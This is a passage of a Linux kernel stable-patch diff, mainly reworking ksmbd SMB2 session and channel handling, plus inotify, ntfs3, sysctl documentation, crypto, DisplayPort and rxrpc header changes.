+@@ -74,14 +74,7 @@ static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
+ 
+ struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
+ {
+-	struct channel *chann;
+-
+-	list_for_each_entry(chann, &sess->ksmbd_chann_list, chann_list) {
+-		if (chann->conn == conn)
+-			return chann;
+-	}
+-
+-	return NULL;
++	return xa_load(&sess->ksmbd_chann_list, (long)conn);
+ }
+ 
+ /**
+@@ -254,7 +247,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 
+ 	rsp = smb2_get_msg(work->response_buf);
+ 
+-	WARN_ON(ksmbd_conn_good(work));
++	WARN_ON(ksmbd_conn_good(conn));
+ 
+ 	rsp->StructureSize = cpu_to_le16(65);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+@@ -284,7 +277,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+ 	conn->use_spnego = true;
+ 
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 	return 0;
+ }
+ 
+@@ -574,7 +567,7 @@ int smb2_check_user_session(struct ksmbd_work *work)
+ 	    cmd == SMB2_SESSION_SETUP_HE)
+ 		return 0;
+ 
+-	if (!ksmbd_conn_good(work))
++	if (!ksmbd_conn_good(conn))
+ 		return -EINVAL;
+ 
+ 	sess_id = le64_to_cpu(req_hdr->SessionId);
+@@ -592,6 +585,7 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
+ 	struct ksmbd_user *prev_user;
+ 	struct channel *chann;
++	long index;
+ 
+ 	if (!prev_sess)
+ 		return;
+@@ -605,10 +599,8 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 		return;
+ 
+ 	prev_sess->state = SMB2_SESSION_EXPIRED;
+-	write_lock(&prev_sess->chann_lock);
+-	list_for_each_entry(chann, &prev_sess->ksmbd_chann_list, chann_list)
+-		chann->conn->status = KSMBD_SESS_EXITING;
+-	write_unlock(&prev_sess->chann_lock);
++	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
++		ksmbd_conn_set_exiting(chann->conn);
+ }
+ 
+ /**
+@@ -1075,7 +1067,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Received negotiate request\n");
+ 	conn->need_neg = false;
+-	if (ksmbd_conn_good(work)) {
++	if (ksmbd_conn_good(conn)) {
+ 		pr_err("conn->tcp_status is already in CifsGood State\n");
+ 		work->send_no_response = 1;
+ 		return rc;
+@@ -1230,7 +1222,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	}
+ 
+ 	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 
+ err_out:
+ 	if (rc < 0)
+@@ -1521,19 +1513,14 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 
+ binding_session:
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1608,19 +1595,14 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ 	}
+ 
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1663,6 +1645,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = 0;
+ 	inc_rfc1001_len(work->response_buf, 9);
+ 
++	ksmbd_conn_lock(conn);
+ 	if (!req->hdr.SessionId) {
+ 		sess = ksmbd_smb2_session_create();
+ 		if (!sess) {
+@@ -1710,6 +1693,12 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++
+ 		if (ksmbd_session_lookup(conn, sess_id)) {
+ 			rc = -EACCES;
+ 			goto out_err;
+@@ -1734,12 +1723,20 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			rc = -ENOENT;
+ 			goto out_err;
+ 		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
+ 	}
+ 	work->sess = sess;
+ 
+-	if (sess->state == SMB2_SESSION_EXPIRED)
+-		sess->state = SMB2_SESSION_IN_PROGRESS;
+-
+ 	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+ 	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+@@ -1769,8 +1766,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				goto out_err;
+ 			}
+ 
+-			ksmbd_conn_set_good(work);
+-			sess->state = SMB2_SESSION_VALID;
++			if (!ksmbd_conn_need_reconnect(conn)) {
++				ksmbd_conn_set_good(conn);
++				sess->state = SMB2_SESSION_VALID;
++			}
+ 			kfree(sess->Preauth_HashValue);
+ 			sess->Preauth_HashValue = NULL;
+ 		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+@@ -1792,8 +1791,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				if (rc)
+ 					goto out_err;
+ 
+-				ksmbd_conn_set_good(work);
+-				sess->state = SMB2_SESSION_VALID;
++				if (!ksmbd_conn_need_reconnect(conn)) {
++					ksmbd_conn_set_good(conn);
++					sess->state = SMB2_SESSION_VALID;
++				}
+ 				if (conn->binding) {
+ 					struct preauth_session *preauth_sess;
+ 
+@@ -1861,14 +1862,17 @@ out_err:
+ 			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
+ 				try_delay = true;
+ 
+-			xa_erase(&conn->sessions, sess->id);
+-			ksmbd_session_destroy(sess);
+-			work->sess = NULL;
+-			if (try_delay)
++			sess->last_active = jiffies;
++			sess->state = SMB2_SESSION_EXPIRED;
++			if (try_delay) {
++				ksmbd_conn_set_need_reconnect(conn);
+ 				ssleep(5);
++				ksmbd_conn_set_need_negotiate(conn);
++			}
+ 		}
+ 	}
+ 
++	ksmbd_conn_unlock(conn);
+ 	return rc;
+ }
+ 
+@@ -2093,21 +2097,25 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_session *sess;
++	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
++	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	/* setting CifsExiting here may race with start_tcp_sess */
+-	ksmbd_conn_set_need_reconnect(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
+ 	ksmbd_close_session_fds(work);
+-	ksmbd_conn_wait_idle(conn);
++	ksmbd_conn_wait_idle(conn, sess_id);
+ 
++	/*
++	 * Re-lookup session to validate if session is deleted
++	 * while waiting request complete
++	 */
++	sess = ksmbd_session_lookup_all(conn, sess_id);
+ 	if (ksmbd_tree_conn_session_logoff(sess)) {
+-		struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+@@ -2119,9 +2127,7 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 
+ 	ksmbd_free_user(sess->user);
+ 	sess->user = NULL;
+-
+-	/* let start_tcp_sess free connection info now */
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
+ 	return 0;
+ }
+ 
+@@ -6953,7 +6959,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 
+ 		nolock = 1;
+ 		/* check locks in connection list */
+-		read_lock(&conn_list_lock);
++		down_read(&conn_list_lock);
+ 		list_for_each_entry(conn, &conn_list, conns_list) {
+ 			spin_lock(&conn->llist_lock);
+ 			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
+@@ -6970,7 +6976,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 						list_del(&cmp_lock->flist);
+ 						list_del(&cmp_lock->clist);
+ 						spin_unlock(&conn->llist_lock);
+-						read_unlock(&conn_list_lock);
++						up_read(&conn_list_lock);
+ 
+ 						locks_free_lock(cmp_lock->fl);
+ 						kfree(cmp_lock);
+@@ -6992,7 +6998,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    cmp_lock->start > smb_lock->start &&
+ 				    cmp_lock->start < smb_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("previous lock conflict with zero byte lock range\n");
+ 					goto out;
+ 				}
+@@ -7001,7 +7007,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    smb_lock->start > cmp_lock->start &&
+ 				    smb_lock->start < cmp_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("current lock conflict with zero byte lock range\n");
+ 					goto out;
+ 				}
+@@ -7012,14 +7018,14 @@ int smb2_lock(struct ksmbd_work *work)
+ 				      cmp_lock->end >= smb_lock->end)) &&
+ 				    !cmp_lock->zero_len && !smb_lock->zero_len) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("Not allow lock operation on exclusive lock range\n");
+ 					goto out;
+ 				}
+ 			}
+ 			spin_unlock(&conn->llist_lock);
+ 		}
+-		read_unlock(&conn_list_lock);
++		up_read(&conn_list_lock);
+ out_check_cl:
+ 		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
+ 			pr_err("Try to unlock nolocked range\n");
+@@ -8434,14 +8440,11 @@ int smb3_check_sign_req(struct ksmbd_work *work)
+ 	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return 0;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key) {
+@@ -8501,14 +8504,11 @@ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ 	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, work->conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key)
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+index 0c8a770fe3189..df05c9b2504d4 100644
+--- a/fs/ksmbd/smb2pdu.h
++++ b/fs/ksmbd/smb2pdu.h
+@@ -61,6 +61,8 @@ struct preauth_integrity_info {
+ #define SMB2_SESSION_IN_PROGRESS	BIT(0)
+ #define SMB2_SESSION_VALID		BIT(1)
+ 
++#define SMB2_SESSION_TIMEOUT		(10 * HZ)
++
+ struct create_durable_req_v2 {
+ 	struct create_context ccontext;
+ 	__u8   Name[8];
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 20e85e2701f26..eff7a1d793f00 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -333,7 +333,7 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		if (length == -EINTR) {
+ 			total_read = -ESHUTDOWN;
+ 			break;
+-		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
++		} else if (ksmbd_conn_need_reconnect(conn)) {
+ 			total_read = -EAGAIN;
+ 			break;
+ 		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
+diff --git a/fs/notify/inotify/inotify_fsnotify.c b/fs/notify/inotify/inotify_fsnotify.c
+index 49cfe2ae6d23d..993375f0db673 100644
+--- a/fs/notify/inotify/inotify_fsnotify.c
++++ b/fs/notify/inotify/inotify_fsnotify.c
+@@ -65,7 +65,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	struct fsnotify_event *fsn_event;
+ 	struct fsnotify_group *group = inode_mark->group;
+ 	int ret;
+-	int len = 0;
++	int len = 0, wd;
+ 	int alloc_len = sizeof(struct inotify_event_info);
+ 	struct mem_cgroup *old_memcg;
+ 
+@@ -80,6 +80,13 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	i_mark = container_of(inode_mark, struct inotify_inode_mark,
+ 			      fsn_mark);
+ 
++	/*
++	 * We can be racing with mark being detached. Don't report event with
++	 * invalid wd.
++	 */
++	wd = READ_ONCE(i_mark->wd);
++	if (wd == -1)
++		return 0;
+ 	/*
+ 	 * Whoever is interested in the event, pays for the allocation. Do not
+ 	 * trigger OOM killer in the target monitoring memcg as it may have
+@@ -110,7 +117,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	fsn_event = &event->fse;
+ 	fsnotify_init_event(fsn_event);
+ 	event->mask = mask;
+-	event->wd = i_mark->wd;
++	event->wd = wd;
+ 	event->sync_cookie = cookie;
+ 	event->name_len = len;
+ 	if (len)
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 723fb64e65316..393c726ef17a9 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -658,7 +658,8 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+ 
+-	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
++	wnd->free_bits =
++		kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index f1df52dfab74b..7d0473da12c33 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1645,7 +1645,7 @@ struct ATTR_FILE_NAME *ni_fname_name(struct ntfs_inode *ni,
+ {
+ 	struct ATTRIB *attr = NULL;
+ 	struct ATTR_FILE_NAME *fname;
+-       struct le_str *fns;
++	struct le_str *fns;
+ 
+ 	if (le)
+ 		*le = NULL;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 567563771bf89..24c9aeb5a49e0 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -2594,8 +2594,10 @@ static inline bool is_reserved_name(struct ntfs_sb_info *sbi,
+ 	if (len == 4 || (len > 4 && le16_to_cpu(name[4]) == '.')) {
+ 		port_digit = le16_to_cpu(name[3]);
+ 		if (port_digit >= '1' && port_digit <= '9')
+-			if (!ntfs_cmp_names(name, 3, COM_NAME, 3, upcase, false) ||
+-			    !ntfs_cmp_names(name, 3, LPT_NAME, 3, upcase, false))
++			if (!ntfs_cmp_names(name, 3, COM_NAME, 3, upcase,
++					    false) ||
++			    !ntfs_cmp_names(name, 3, LPT_NAME, 3, upcase,
++					    false))
+ 				return true;
+ 	}
+ 
+diff --git a/fs/ntfs3/namei.c b/fs/ntfs3/namei.c
+index c8db35e2ae172..53ddea219e377 100644
+--- a/fs/ntfs3/namei.c
++++ b/fs/ntfs3/namei.c
+@@ -88,6 +88,16 @@ static struct dentry *ntfs_lookup(struct inode *dir, struct dentry *dentry,
+ 		__putname(uni);
+ 	}
+ 
++	/*
++	 * Check for a null pointer
++	 * If the MFT record of ntfs inode is not a base record, inode->i_op can be NULL.
++	 * This causes null pointer dereference in d_splice_alias().
++	 */
++	if (!IS_ERR_OR_NULL(inode) && !inode->i_op) {
++		iput(inode);
++		inode = ERR_PTR(-EINVAL);
++	}
++
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 86ea1826d0998..90151e56c1222 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -435,9 +435,6 @@ static inline u64 attr_svcn(const struct ATTRIB *attr)
+ 	return attr->non_res ? le64_to_cpu(attr->nres.svcn) : 0;
+ }
+ 
+-/* The size of resident attribute by its resident size. */
+-#define BYTES_PER_RESIDENT(b) (0x18 + (b))
+-
+ static_assert(sizeof(struct ATTRIB) == 0x48);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->res) == 0x08);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->nres) == 0x38);
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 436025e0f77a6..d20b3e5f64d0a 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1287,7 +1287,10 @@ out:
+  * __register_sysctl_table - register a leaf sysctl table
+  * @set: Sysctl tree to register on
+  * @path: The path to the directory the sysctl table is in.
+- * @table: the top-level table structure
++ * @table: the top-level table structure without any child. This table
++ * 	 should not be free'd after registration. So it should not be
++ * 	 used on stack. It can either be a global or dynamically allocated
++ * 	 by the caller and free'd later after sysctl unregistration.
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1308,9 +1311,12 @@ out:
+  * proc_handler - the text handler routine (described below)
+  *
+  * extra1, extra2 - extra pointers usable by the proc handler routines
++ * XXX: we should eventually modify these to use long min / max [0]
++ * [0] https://lkml.kernel.org/87zgpte9o4.fsf@email.froward.int.ebiederm.org
+  *
+  * Leaf nodes in the sysctl tree will be represented by a single file
+- * under /proc; non-leaf nodes will be represented by directories.
++ * under /proc; non-leaf nodes (where child is not NULL) are not allowed,
++ * sysctl_check_table() verifies this.
+  *
+  * There must be a proc_handler routine for any terminal nodes.
+  * Several default handlers are available to cover common cases -
+@@ -1352,7 +1358,7 @@ struct ctl_table_header *__register_sysctl_table(
+ 
+ 	spin_lock(&sysctl_lock);
+ 	dir = &set->dir;
+-	/* Reference moved down the diretory tree get_subdir */
++	/* Reference moved down the directory tree get_subdir */
+ 	dir->header.nreg++;
+ 	spin_unlock(&sysctl_lock);
+ 
+@@ -1369,6 +1375,11 @@ struct ctl_table_header *__register_sysctl_table(
+ 		if (namelen == 0)
+ 			continue;
+ 
++		/*
++		 * namelen ensures if name is "foo/bar/yay" only foo is
++		 * registered first. We traverse as if using mkdir -p and
++		 * return a ctl_dir for the last directory entry.
++		 */
+ 		dir = get_subdir(dir, name, namelen);
+ 		if (IS_ERR(dir))
+ 			goto fail;
+@@ -1394,8 +1405,15 @@ fail:
+ 
+ /**
+  * register_sysctl - register a sysctl table
+- * @path: The path to the directory the sysctl table is in.
+- * @table: the table structure
++ * @path: The path to the directory the sysctl table is in. If the path
++ * 	doesn't exist we will create it for you.
++ * @table: the table structure. The calller must ensure the life of the @table
++ * 	will be kept during the lifetime use of the syctl. It must not be freed
++ * 	until unregister_sysctl_table() is called with the given returned table
++ * 	with this registration. If your code is non modular then you don't need
++ * 	to call unregister_sysctl_table() and can instead use something like
++ * 	register_sysctl_init() which does not care for the result of the syctl
++ * 	registration.
+  *
+  * Register a sysctl table. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1411,8 +1429,11 @@ EXPORT_SYMBOL(register_sysctl);
+ 
+ /**
+  * __register_sysctl_init() - register sysctl table to path
+- * @path: path name for sysctl base
+- * @table: This is the sysctl table that needs to be registered to the path
++ * @path: path name for sysctl base. If that path doesn't exist we will create
++ * 	it for you.
++ * @table: This is the sysctl table that needs to be registered to the path.
++ * 	The caller must ensure the life of the @table will be kept during the
++ * 	lifetime use of the sysctl.
+  * @table_name: The name of sysctl table, only used for log printing when
+  *              registration fails
+  *
+@@ -1424,10 +1445,7 @@ EXPORT_SYMBOL(register_sysctl);
+  * register_sysctl() failing on init are extremely low, and so for both reasons
+  * this function does not return any error as it is used by initialization code.
+  *
+- * Context: Can only be called after your respective sysctl base path has been
+- * registered. So for instance, most base directories are registered early on
+- * init before init levels are processed through proc_sys_init() and
+- * sysctl_init_bases().
++ * Context: if your base directory does not exist it will be created for you.
+  */
+ void __init __register_sysctl_init(const char *path, struct ctl_table *table,
+ 				 const char *table_name)
+@@ -1557,6 +1575,7 @@ out:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this call so avoid its use.
+  *
+  * See __register_sysctl_table for more details.
+  */
+@@ -1628,6 +1647,7 @@ err_register_leaves:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this caller so avoid future uses of it.
+  *
+  * See __register_sysctl_paths for more details.
+  */
+diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h
+index 61b327206b557..1fd81e74a174f 100644
+--- a/include/crypto/algapi.h
++++ b/include/crypto/algapi.h
+@@ -302,4 +302,11 @@ enum {
+ 	CRYPTO_MSG_ALG_LOADED,
+ };
+ 
++static inline void crypto_request_complete(struct crypto_async_request *req,
++					   int err)
++{
++	crypto_completion_t complete = req->complete;
++	complete(req, err);
++}
++
+ #endif	/* _CRYPTO_ALGAPI_H */
+diff --git a/include/drm/display/drm_dp.h b/include/drm/display/drm_dp.h
+index e934aab357bea..05f2cc03d03d9 100644
+--- a/include/drm/display/drm_dp.h
++++ b/include/drm/display/drm_dp.h
+@@ -240,6 +240,8 @@
+ #define DP_DSC_SUPPORT                      0x060   /* DP 1.4 */
+ # define DP_DSC_DECOMPRESSION_IS_SUPPORTED  (1 << 0)
+ # define DP_DSC_PASSTHROUGH_IS_SUPPORTED    (1 << 1)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_COMP_TO_COMP    (1 << 2)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_UNCOMP_TO_COMP  (1 << 3)
+ 
+ #define DP_DSC_REV                          0x061
+ # define DP_DSC_MAJOR_MASK                  (0xf << 0)
+@@ -278,12 +280,14 @@
+ 
+ #define DP_DSC_BLK_PREDICTION_SUPPORT       0x066
+ # define DP_DSC_BLK_PREDICTION_IS_SUPPORTED (1 << 0)
++# define DP_DSC_RGB_COLOR_CONV_BYPASS_SUPPORT (1 << 1)
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_LOW       0x067   /* eDP 1.4 */
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_HI        0x068   /* eDP 1.4 */
+ # define DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK  (0x3 << 0)
+-# define DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT 8
++# define DP_DSC_MAX_BPP_DELTA_VERSION_MASK  (0x3 << 5)	/* eDP 1.5 & DP 2.0 */
++# define DP_DSC_MAX_BPP_DELTA_AVAILABILITY  (1 << 7)	/* eDP 1.5 & DP 2.0 */
+ 
+ #define DP_DSC_DEC_COLOR_FORMAT_CAP         0x069
+ # define DP_DSC_RGB                         (1 << 0)
+@@ -345,11 +349,13 @@
+ # define DP_DSC_24_PER_DP_DSC_SINK          (1 << 2)
+ 
+ #define DP_DSC_BITS_PER_PIXEL_INC           0x06F
++# define DP_DSC_RGB_YCbCr444_MAX_BPP_DELTA_MASK 0x1f
++# define DP_DSC_RGB_YCbCr420_MAX_BPP_DELTA_MASK 0xe0
+ # define DP_DSC_BITS_PER_PIXEL_1_16         0x0
+ # define DP_DSC_BITS_PER_PIXEL_1_8          0x1
+ # define DP_DSC_BITS_PER_PIXEL_1_4          0x2
+ # define DP_DSC_BITS_PER_PIXEL_1_2          0x3
+-# define DP_DSC_BITS_PER_PIXEL_1            0x4
++# define DP_DSC_BITS_PER_PIXEL_1_1          0x4
+ 
+ #define DP_PSR_SUPPORT                      0x070   /* XXX 1.2? */
+ # define DP_PSR_IS_SUPPORTED                1
+diff --git a/include/drm/display/drm_dp_helper.h b/include/drm/display/drm_dp_helper.h
+index ab55453f2d2cd..ade9df59e156a 100644
+--- a/include/drm/display/drm_dp_helper.h
++++ b/include/drm/display/drm_dp_helper.h
+@@ -181,9 +181,8 @@ static inline u16
+ drm_edp_dsc_sink_output_bpp(const u8 dsc_dpcd[DP_DSC_RECEIVER_CAP_SIZE])
+ {
+ 	return dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_LOW - DP_DSC_SUPPORT] |
+-		(dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK <<
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT);
++		((dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
++		  DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK) << 8);
+ }
+ 
+ static inline u32
+diff --git a/include/linux/crypto.h b/include/linux/crypto.h
+index 5d1e961f810ec..b18f6e669fb10 100644
+--- a/include/linux/crypto.h
++++ b/include/linux/crypto.h
+@@ -176,6 +176,7 @@ struct crypto_async_request;
+ struct crypto_tfm;
+ struct crypto_type;
+ 
++typedef struct crypto_async_request crypto_completion_data_t;
+ typedef void (*crypto_completion_t)(struct crypto_async_request *req, int err);
+ 
+ /**
+@@ -595,6 +596,11 @@ struct crypto_wait {
+ /*
+  * Async ops completion helper functioons
+  */
++static inline void *crypto_get_completion_data(crypto_completion_data_t *req)
++{
++	return req->data;
++}
++
+ void crypto_req_done(struct crypto_async_request *req, int err);
+ 
+ static inline int crypto_wait_req(int err, struct crypto_wait *wait)
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 45c3d62e616d8..95f33dadb2be2 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -567,6 +567,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F3 0x166d
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F3 0x14e3
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F3 0x14f3
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F3 0x12fb
+ #define PCI_DEVICE_ID_AMD_CNB17H_F3	0x1703
+ #define PCI_DEVICE_ID_AMD_LANCE		0x2000
+ #define PCI_DEVICE_ID_AMD_LANCE_HOME	0x2001
+diff --git a/include/net/af_rxrpc.h b/include/net/af_rxrpc.h
+index ba717eac0229a..73644bd42a3f9 100644
+--- a/include/net/af_rxrpc.h
++++ b/include/net/af_rxrpc.h
+@@ -40,16 +40,17 @@ typedef void (*rxrpc_user_attach_call_t)(struct rxrpc_call *, unsigned long);
+ void rxrpc_kernel_new_call_notification(struct socket *,
+ 					rxrpc_notify_new_call_t,
+ 					rxrpc_discard_new_call_t);
+-struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *,
+-					   struct sockaddr_rxrpc *,
+-					   struct key *,
+-					   unsigned long,
+-					   s64,
+-					   gfp_t,
+-					   rxrpc_notify_rx_t,
+-					   bool,
+-					   enum rxrpc_interruptibility,
+-					   unsigned int);
++struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *sock,
++					   struct sockaddr_rxrpc *srx,
++					   struct key *key,
++					   unsigned long user_call_ID,
++					   s64 tx_total_len,
++					   u32 hard_timeout,
++					   gfp_t gfp,
++					   rxrpc_notify_rx_t notify_rx,
++					   bool upgrade,
++					   enum rxrpc_interruptibility interruptibility,
